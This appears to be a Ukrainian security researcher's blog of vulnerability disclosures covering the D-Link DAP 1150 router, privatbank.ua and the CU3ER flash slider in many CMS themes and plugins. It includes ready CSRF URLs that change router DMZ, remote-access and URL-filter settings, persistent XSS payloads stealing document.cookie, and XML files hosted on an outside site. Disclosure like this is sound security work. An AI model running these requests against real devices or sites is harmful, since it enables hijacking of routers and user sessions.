Websecurity - Веб безпека

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

Нагадаю, що в першому звіті про уразливості в D-Link DAP 1150, я писав про CSRF в формі логіна в адмінку пристрою та інші уразливості, що дозволяють віддалено входити в адмінку для проведення CSRF і XSS атак всередині адмінки.

CSRF (WASC-09):

В розділі Advanced / Device mode через CSRF можна змінювати режим роботи пристрою. Якщо увімкнений режим точки доступу, то для атаки на уразливості в режимі роутера потрібно увімкнути цей режим.

Увімкнути режим точки доступу:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0

Увімкнути режим роутера:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0

CSRF (WASC-09):

В розділі Advanced / Remote access через CSRF можна можна додавати, редагувати та видаляти налаштування віддаленого доступу до веб інтерфейсу. Наступний запит дозволить віддалений доступ в адмінку з IP 50.50.50.50.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Advanced / Remote access.

Атака через функцію додавання в параметрі res_buf (в полях: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1

Атака через функцію редагування в параметрі res_buf (в полях: IP address, Mask):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0

У червні, 23.06.2013, я знайшов нові Cross-Site Scripting та Insufficient Anti-automation уразливості на http://privatbank.ua. За 3 XSS уразливості ПриватБанк мені заплатив (тому про них я деталей не наведу), але досі повністю не виправив. Адміни додали фільтри, але їх потенційно можна обійти - ось тому потрібно якісно виправляти уразливості. А от IAA дірку виправляти не стали.

Стосовно ПриватБанка я вже писав про численні уразливості на www.blog.privatbank.ua та уразливості в LiqPAY для Android та iOS.

Всі уразливості наявні в формі http://privatbank.ua/cpa/credit-card/. Ось інформація про IAA, яку ПриватБанк не захотів виправляти, мотивуючи це тим, що в них капча розробляється, тому всі ці та інші IAA (що я знайшов на privatbank.ua та інших сайтах, а таких дірок я знайшов багато) вони “вважають виправленими”, мовляв капчу зроблять і поставлять на своїх сайтах. При тому, що в деяких формах вже є капча, але вони мовляв роблять нову. Це така відмазка, аби не виправляти дірки на своїх сайтах і не проводити оплату цих дірок.

Insufficient Anti-automation:

В формі http://privatbank.ua/cpa/credit-card/ немає захисту від автоматизованих атак (капчі).

Дана уразливість, як і багато подібних дірок, досі не виправлені.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах OptimizePress, FormCraft та PhotoSmash Galleries. Для котрих з’явилися експлоіти. OptimizePress - це тема движка, FormCraft - це плагін для створення форм, PhotoSmash Galleries - це плагін для створення галерей зображень.

• WordPress OptimizePress Theme File Upload (деталі)
• WordPress FormCraft Premium SQL Injection (деталі)
• WordPress Photosmash Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Juniper Secure Access XSS Vulnerability (деталі)
• SAMSPADE 1.14 BUFFER OVERFLOW (деталі)
• LiveZilla 5.1.2.0 Insecure password storage (деталі)
• LiveZilla 5.1.2.0 PHP Object Injection (деталі)
• HP Service Manager and HP ServiceCenter, Cross Site Scripting (XSS) and Disclosure of Information (деталі)

Раніше я писав про уразливості в CU3ER. У квітні, 19.04.2014, я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних темах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Окрім плагінів, про які я писав, флешка CU3ER також міститься в наступних шаблонах для WordPress: ShapeShifter, Los Angeles, Themebox, Elite Force, Webfolio та інших темах, в тому числі платних і кастом темах розроблених для окремих сайтів.

Content Spoofing (WASC-12):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/1.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/1.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/1.xml
Директорія також може називатися themebox10 і themebox11

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/1.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/1.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

ShapeShifter:

http://site/wp-content/themes/shapeshifter/library/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/shapeshifter2/library/cu3er/cu3er.swf?xml=http://site2/xss.xml

Los Angeles:

http://site/wp-content/themes/los_angeles/assets/flash/cu3er.swf?xml=http://site2/xss.xml

Themebox:

http://site/wp-content/themes/themebox/cu3er/cu3er.swf?xml=http://site2/xss.xml
Директорія також може називатися themebox10 і themebox11

Elite Force:

http://site/wp-content/themes/elite_force/lib/includes/cu3er/cu3er.swf?xml=http://site2/xss.xml
http://site/wp-content/themes/elite_force/inc/cu3er/cu3er.swf?xml=http://site2/xss.xml

Webfolio:

http://site/wp-content/themes/webfolio/cu3er/cu3er.swf?xml=http://site2

1.xml:

cu3er-1.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Full path disclosure (WASC-13):

FPD в php-файлах шаблонів (по замовчуванню) або в error_log. В index.php та інших php-файлах.

http://site/wp-content/themes/shapeshifter/
http://site/wp-content/themes/shapeshifter2/
http://site/wp-content/themes/los_angeles/
http://site/wp-content/themes/themebox/
http://site/wp-content/themes/themebox10/
http://site/wp-content/themes/themebox11/
http://site/wp-content/themes/elite_force/
http://site/wp-content/themes/webfolio/

Уразливі всі шаблони з флешкою CU3ER: ShapeShifter 1.x і 2.x, Los Angeles, Themebox 1.1, Elite Force 2.1.0, Webfolio 2.0.2 та попередні версії цих тем.

Раніше я писав про уразливості в CU3ER. Сьогодні я виявив Content Spoofing, Cross-Site Scripting та Full path disclosure уразливості в численних плагінах з CU3ER для WordPress. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Вчора я писав про wpCU3ER для WordPress. Флешка CU3ER також міститься в наступних плагінах для WordPress: NextGen Cu3er Gallery, Simple Cu3er, Cu3er Post Elements, Gallery Manager, Cu3er Slider та інших плагінах, в тому числі кастом плагінах розроблених для окремих сайтів.

Content Spoofing (WASC-12):

NextGen Cu3er Gallery:

http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/1.xml

Simple Cu3er:

http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/1.xml

Cu3er Post Elements:

http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/1.xml

Gallery Manager:

http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/1.xml

Cu3er Slider:

http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/1.xml

Cross-Site Scripting (WASC-08):

NextGen Cu3er Gallery:

http://site/wp-content/plugins/nextgen-cu3er-gallery/swf/cu3er.swf?xml=http://site2/xss.xml

Simple Cu3er:

http://site/wp-content/plugins/simple-cu3er/swf/cu3er.swf?xml=http://site2/xss.xml

Cu3er Post Elements:

http://site/wp-content/plugins/cu3er-post-elements/cu3er.swf?xml=http://site2/xss.xml

Gallery Manager:

http://site/wp-content/plugins/gallery-manager/swf/cu3er.swf?xml=http://site2/xss.xml

Cu3er Slider:

http://site/wp-content/plugins/cu3er-slider/cu3er.swf?xml=http://site2/xss.xml

1.xml:

cu3er-1.xml

xss.xml:

cu3er-2.xml

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Full path disclosure (WASC-13):

FPD в php-файлах плагінів (по замовчуванню) або в error_log.

http://site/wp-content/plugins/nextgen-cu3er-gallery/cu3er.php
http://site/wp-content/plugins/nextgen-cu3er-gallery/xml/cu3er.php
http://site/wp-content/plugins/simple-cu3er/simple-cu3er.php
http://site/wp-content/plugins/cu3er-post-elements/cu3er-post-elements.php
http://site/wp-content/plugins/gallery-manager/gallery-manager.php та в багатьох php-файлах в підпапках плагіна
http://site/wp-content/plugins/cu3er-slider/cu3er-slider.php

Уразливі всі плагіни з флешкою CU3ER: NextGen Cu3er Gallery 0.1, Simple Cu3er 1.0.1, Cu3er Post Elements 0.5.1, Gallery Manager, Cu3er Slider та попередні версії цих плагінів.

26.11.2013

Раніше я писав про уразливості в CU3ER. У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в веб додатку CU3ER та численних плагінах. Ця флешка використовується на мільйоні сайтів і в багатьох плагінах для різних CMS. Про що найближчим часом повідомлю розробникам даних плагінів.

Детальна інформація про уразливості з’явиться пізніше.

18.04.2014

Флешка CU3ER міститься в wpCU3ER для WordPress, jCU3ER і Vinaora Cu3er 3D Slide-show для Joomla, cu3er-silverstripe-extension для SilverStripe, collective.cu3er для Plone та багатьох інших плагінах. І всі вони мають Content Spoofing та XSS уразливості.

Адреси флешки в різних плагінах:

http://site/wp-content/uploads/wpcu3er/CU3ER.swf
В старих версіях плагіна:
http://site/wp-content/plugins/wp-cu3er/cu3er.swf
http://site/wp-content/plugins/wp-cu3er/assets/cu3er/cu3er.swf

http://site/components/com_cu3er/flash/CU3ER.swf

http://site/media/mod_vinaora_cu3er/flash/cu3er.swf

http://site/cu3er-silverstripe-extension/flash/cu3er.swf

http://site/collective/cu3er/browser/flash/cu3er.swf

Перші два плагіни використовують останню версію CU3ER, а три інші плагини використовують версію 0.9.2 (а також в старих версіях wp-cu3er).

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.

CS (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

cu3er-3.xml

XSS (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

cu3er-4.xml

Уразливі всі плагіни з флешкою CU3ER: wpCU3ER 0.75, jCU3ER 0.12, Vinaora Cu3er 3D Slide-show 1.2.1, 2.5.3, 3.1.1, cu3er-silverstripe-extension, collective.cu3er 0.1 та попередні версії цих плагінів.

В даній добірці уразливості в веб додатках:

• HP LoadRunner, Remote Code Execution and Denial of Service (DoS) (деталі)
• LiveZilla 5.1.1.0 Stored XSS in operator clients (деталі)
• FlashCanvas 1.5 proxy.php XSS Vulnerability (деталі)
• Vtiger 5.4.0 Reflected Cross Site Scripting (деталі)
• Samsung TV - DoS vulnerability (деталі)

22.11.2013

У жовтні, 12.10.2013, я виявив Content Spoofing та Cross-Site Scripting уразливості в CU3ER. Це 3D слайдер зображень на флеші. Про що найближчим часом повідомлю розробникам веб додатку.

Детальна інформація про уразливості з’явиться пізніше.

17.04.2014

Content Spoofing (WASC-12):

http://site/cu3er.swf?xml=http://site2/1.xml

1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>http://websecurity.com.ua</link>
</slide>
</slides>
</cu3er>

Cross-Site Scripting (WASC-08):

http://site/cu3er.swf?xml=http://site2/xss.xml

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<cu3er>
<slides>
<slide>
<url>1.jpg</url>
<link>javascript:alert(document.cookie)</link>
</slide>
</slides>
</cu3er>

Для атаки між доменами потрібен crossdomain.xml на сайті з xml-файлами.

Це приклади CS і XSS атак для версії CU3ER 0.9.2. Для останньої версії 1.24 потрібні інші xml-файли та для флешки вказується інший параметр.

CS (WASC-12):

http://site/cu3er.swf?xml_location=http://site2/1.xml

cu3er-3.xml

XSS (WASC-08):

http://site/cu3er.swf?xml_location=http://site2/xss.xml

cu3er-4.xml

Уразливі CU3ER 1.24 та попередні версії.

Продовжуючи тему уразливостей в D-Link DAP 1150. Раніше я розповідав про два режими роботи цього пристрою і зараз представляю нові уразливості в режимі роутера. У листопаді, 17.11.2011, я виявив численні Cross-Site Request Forgery, Abuse of Functionality та Cross-Site Scripting уразливості в D-Link DAP 1150 (Wi-Fi Access Point and Router).

Уразлива версія D-Link DAP 1150, Firmware version 1.2.94. Дана модель з іншими прошивками також повинна бути вразливою. Компанія D-Link тоді проігнорувала усі уразливості в цьому пристрої й досі їх не виправила.

Нагадаю, що в першому звіті про уразливості в D-Link DAP 1150, я писав про CSRF в формі логіна в адмінку пристрою та інші уразливості, що дозволяють віддалено входити в адмінку для проведення CSRF і XSS атак всередині адмінки.

CSRF (WASC-09):

В розділі Firewall / DMZ через CSRF можна змінювати налаштувань DMZ.

Включити DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:true,%22ip%22:%22192.168.1.1%22}&res_pos=0

Виключити DMZ:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=23&res_struct_size=0&res_buf={%22enable%22:false,%22ip%22:%22%22}&res_pos=0

CSRF (WASC-09):

В розділі Control / URL-filter через CSRF можна додавати, редагувати та видаляти налаштування URL-фільтрів.

Додати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=-1

Редагувати:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://site%22,%20%22enable%22:%22ACCEPT%22}&res_pos=0

Видалити:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=58&res_pos=0

Abuse of Functionality (WASC-42):

Цей функціонал можна використати для блокування доступу користувачам роутера до сайтів. Заборонити доступ до google.com:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22http://google.com%22,%20%22enable%22:%22DROP%22}&res_pos=-1

XSS (WASC-08):

Це persistent XSS. Код виконається в розділі Control / URL-filter.

Атака через функцію додавання в параметрі res_buf:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_struct_size=0&res_config_id=58&res_buf={%22url%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22enable%22:%22%22}&res_pos=-1